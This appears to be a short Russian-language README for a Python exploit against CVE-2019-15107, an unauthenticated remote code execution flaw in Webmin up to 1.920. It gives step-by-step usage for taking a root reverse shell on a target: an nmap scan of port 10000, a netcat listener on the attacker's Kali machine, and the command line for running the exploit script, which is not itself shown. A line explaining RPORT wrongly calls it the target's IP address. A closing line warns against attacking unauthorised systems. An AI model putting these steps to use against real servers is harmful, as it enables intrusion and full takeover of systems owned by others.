
CVE-2019–15107 - Неаутентифицированное удалённое выполнение кода в Webmin <=1.920
Этот скрипт на Python должен дать вам root-шелл на Webmin 1.890
Проверка с помощью nmap:
nmap -sC -sV -p 10000 TARGET_IP
Результат:
10000/tcp open http MiniServ 1.890 (Webmin httpd)
Как использовать этот эксплойт:
Шаг 1:
nc -lnvp LPORT
Шаг 2:
chmod +x exploit.py
./exploit RHOST RPORT LHOST LPORT
RHOST = цель
RPORT = IP-адрес цели (обычно 10000)
LHOST = ваша машина с Kali
LPORT = ваш порт для обратной оболочки
Шаг 3: Получите root-шелл!
НЕ НАНОСИТЕ ВРЕД НЕСАНКЦИОНИРОВАННЫМ СИСТЕМАМ!!!